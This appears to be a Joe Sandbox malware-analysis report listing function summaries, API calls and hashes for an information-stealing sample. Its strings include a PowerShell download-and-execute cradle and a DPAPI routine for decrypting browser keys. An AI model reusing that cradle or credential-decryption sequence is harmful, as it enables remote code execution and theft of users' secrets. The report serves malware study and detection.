                                                                                  • Instruction Fuzzy Hash: E751E5B1A04109EBDB08CF98E981AEFB7F5FF88300F148559F915A7240D734AA52DBA5
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: *n@$*n@
                                                                                  • API String ID: 1029625771-193229609
                                                                                  • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                                                  • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                                                                  • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                                                  • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                                                                  APIs
                                                                                  • lstrcat.KERNEL32(?,0064A30C), ref: 00B14A42
                                                                                    • Part of subcall function 00B19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B19072
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B14A68
                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B14A87
                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B14A9B
                                                                                  • lstrcat.KERNEL32(?,0064A284), ref: 00B14AAE
                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B14AC2
                                                                                  • lstrcat.KERNEL32(?,0064A2C8), ref: 00B14AD6
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B18FF7: GetFileAttributesA.KERNEL32(00000000,?,00B01DBB,?,?,0042565C,?,?,00420E1F), ref: 00B19006
                                                                                    • Part of subcall function 00B147D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B147E7
                                                                                    • Part of subcall function 00B147D7: RtlAllocateHeap.NTDLL(00000000), ref: 00B147EE
                                                                                    • Part of subcall function 00B147D7: wsprintfA.USER32 ref: 00B1480D
                                                                                    • Part of subcall function 00B147D7: FindFirstFileA.KERNEL32(?,?), ref: 00B14824
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2540262943-0
                                                                                  • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                                                  • Instruction ID: 947533a9a82f1d7e611b3499f254a425c3d9856399c4106fe03d98f4ba829cfe
                                                                                  • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                                                  • Instruction Fuzzy Hash: E53162F69402086BDB14FBF0DC85EEA73B9BB58700F8045C9B24596081EEB597C9CB95
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                                                                  Strings
                                                                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                                                                  • ')", xrefs: 00412CB3
                                                                                  • <, xrefs: 00412D39
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  • API String ID: 3031569214-898575020
                                                                                  • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                                                  • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                                                                  • Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                                                  • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                                                                  APIs
                                                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B014A5
                                                                                  • __aulldiv.LIBCMT ref: 00B014BF
                                                                                  • __aulldiv.LIBCMT ref: 00B014CD
                                                                                  • ExitProcess.KERNEL32 ref: 00B014FB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                  • String ID: @
                                                                                  • API String ID: 3404098578-2766056989
                                                                                  • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                                                  • Instruction ID: 836e8706b11745c0af51f907765470974c4aff07afab487f6a6db00e5638751b
                                                                                  • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                                                  • Instruction Fuzzy Hash: 9801FBB0940308FAEF14DBD4CC89B9DBAB8EB50705F608888F6057B2D0D6B496858B55
                                                                                  APIs
                                                                                  • memcmp.MSVCRT(?,00421264,00000003), ref: 00B0A094
                                                                                    • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
                                                                                    • Part of subcall function 00B10CC7: memset.MSVCRT ref: 00B10E83
                                                                                    • Part of subcall function 00B10CC7: lstrcat.KERNEL32(?,00000000), ref: 00B10E9C
                                                                                    • Part of subcall function 00B10CC7: lstrcat.KERNEL32(?,00420D7C), ref: 00B10EAE
                                                                                    • Part of subcall function 00B10CC7: lstrcat.KERNEL32(?,00000000), ref: 00B10EC4
                                                                                    • Part of subcall function 00B10CC7: lstrcat.KERNEL32(?,00420D80), ref: 00B10ED6
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  • memcmp.MSVCRT(?,00421114,00000003), ref: 00B0A116
                                                                                  • memset.MSVCRT ref: 00B0A14F
                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00B0A1A8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                                                  • String ID: @
                                                                                  • API String ID: 1977917189-2766056989
                                                                                  • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                                                  • Instruction ID: 372f73e869a291c4f18a706850715944938958475b4a4cf34c00f4202743b72a
                                                                                  • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                                                  • Instruction Fuzzy Hash: 20615B70600248EBCB18EFA4CD96FED7BB1AF44300F408158F90AAB591EB746A45CB42
                                                                                  APIs
                                                                                  • strtok_s.MSVCRT ref: 00410DB8
                                                                                  • strtok_s.MSVCRT ref: 00410EFD
                                                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,009045D8,?,0042110C,?,00000000), ref: 0041A82B
                                                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: strtok_s$lstrcpylstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 348468850-0
                                                                                  • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                                                  • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                                                                  • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                                                  • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                                                    • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                                                    • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                                                  • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                                                    • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                                                    • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                                                    • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                                                    • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                                                  • String ID: $"encrypted_key":"$DPAPI
                                                                                  • API String ID: 3731072634-738592651
                                                                                  • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                                                  • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                                                                  • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                                                  • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CodeInfoPageValidmemset
                                                                                  • String ID:
                                                                                  • API String ID: 703783727-0
                                                                                  • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                                                  • Instruction ID: 312cd82d977caac84190f7cfbddd4ce8e65e609e36fca0e1bc2849f12e60d507
                                                                                  • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                                                  • Instruction Fuzzy Hash: A531F831A842959ED7268F75C8953F9BFE1DF06310B9841FAD881CF192C328D986D761
                                                                                  APIs
                                                                                  • GetSystemTime.KERNEL32(?), ref: 00B16BD3
                                                                                  • sscanf.NTDLL ref: 00B16C00
                                                                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B16C19
                                                                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B16C27
                                                                                  • ExitProcess.KERNEL32 ref: 00B16C41
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Time$System$File$ExitProcesssscanf
                                                                                  • String ID:
                                                                                  • API String ID: 2533653975-0
                                                                                  • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                                                  • Instruction ID: 7cde1eb3b378e3875c45d5d4fb24c7d189a1aaf557ba540ee9274f261eebea37
                                                                                  • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                                                  • Instruction Fuzzy Hash: F521E7B5D14209ABCF08EFE4D945AEEB7FAFF48300F44856EE406A3250EB345604CBA5
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00902B70,00000000,00020119,?), ref: 00417E5E
                                                                                  • RegQueryValueExA.ADVAPI32(?,0090A350,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3466090806-0
                                                                                  • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                                                  • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                                                                  • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                                                  • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
APIs
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B1809E
• RtlAllocateHeap.NTDLL(00000000), ref: 00B180A5
• RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 00B180C5
• RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 00B180E6
• RegCloseKey.ADVAPI32(?), ref: 00B180F9
Memory Dump Source
• Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateCloseOpenProcessQueryValue
• String ID:
• API String ID: 3225020163-0
• Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
• Instruction ID: c790ae86c3e2e8a3f972420b4421d6cdfc0b9ba8566ac1998e8503848bc4e57f
• Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
• Instruction Fuzzy Hash: EB113DB6A84209FBD710DFD4DD4AFABB7B9FB09710F104159F615A7280CB7558018BA1
APIs
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B1799B
• RtlAllocateHeap.NTDLL(00000000), ref: 00B179A2
• RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00B17920), ref: 00B179C2
• RegQueryValueExA.ADVAPI32(00B17920,00420AAC,00000000,00000000,?,000000FF), ref: 00B179E1
• RegCloseKey.ADVAPI32(00B17920), ref: 00B179EB
Memory Dump Source
• Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateCloseOpenProcessQueryValue
• String ID:
• API String ID: 3225020163-0
• Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
• Instruction ID: e49d03648ba8d1b6caadac0d811968fcb3adc2ff0f535697410e71bdd4af6edf
• Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
• Instruction Fuzzy Hash: 8301F4B9A80308BFEB10DFE4DC4AFAEB7B9EB44701F104559FA05A7281DA7555408F51
APIs
• StrStrA.SHLWAPI(009099F8,?,?,?,0041140C,?,009099F8,00000000), ref: 0041926C
• lstrcpyn.KERNEL32(0064AB88,009099F8,009099F8,?,0041140C,?,009099F8), ref: 00419290
• lstrlenA.KERNEL32(?,?,0041140C,?,009099F8), ref: 004192A7
• wsprintfA.USER32 ref: 004192C7
Strings
Memory Dump Source
• Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
Yara matches
Similarity
• API ID: lstrcpynlstrlenwsprintf
• String ID: %s%s
• API String ID: 1206339513-3252725368
• Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
• Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
• Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
• Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
• HeapAlloc.KERNEL32(00000000), ref: 004012BB
• RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
• RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
• RegCloseKey.ADVAPI32(?), ref: 004012FF
Memory Dump Source
• Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
Yara matches
Similarity
• API ID: Heap$AllocCloseOpenProcessQueryValue
• String ID:
• API String ID: 3466090806-0
• Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
• Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
• Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
• Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
APIs
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B0151B
• RtlAllocateHeap.NTDLL(00000000), ref: 00B01522
• RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00B0153E
• RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B0155C
• RegCloseKey.ADVAPI32(?), ref: 00B01566
Memory Dump Source
• Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateCloseOpenProcessQueryValue
• String ID:
• API String ID: 3225020163-0
• Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
• Instruction ID: 4b25d51ec235483ff74c6685c0db203ae134d8f87f2c2be21d7b417d2f9b4bd6
• Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
• Instruction Fuzzy Hash: 770131BDA40208BFDB14DFE4DC49FAEB7BDEB48701F008159FA0597280D6749A018F91
APIs
• __getptd.LIBCMT ref: 0041C74E
  • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
  • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
• __getptd.LIBCMT ref: 0041C765
• __amsg_exit.LIBCMT ref: 0041C773
• __lock.LIBCMT ref: 0041C783
• __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
Memory Dump Source
• Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
Yara matches
Similarity
• API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
• String ID:
• API String ID: 938513278-0
• Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
• Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
• Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
• Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
APIs
• __getptd.LIBCMT ref: 00B1C9B5
  • Part of subcall function 00B1C206: __getptd_noexit.LIBCMT ref: 00B1C209
  • Part of subcall function 00B1C206: __amsg_exit.LIBCMT ref: 00B1C216
• __getptd.LIBCMT ref: 00B1C9CC
• __amsg_exit.LIBCMT ref: 00B1C9DA
• __lock.LIBCMT ref: 00B1C9EA
• __updatetlocinfoEx_nolock.LIBCMT ref: 00B1C9FE
Memory Dump Source
• Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
Yara matches
Similarity
• API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
• String ID:
• API String ID: 938513278-0
• Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
• Instruction ID: 8d6e080c8606a3c93b023685f4022d76e62dd94b0b3d1a59ddc62c785389e241
• Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
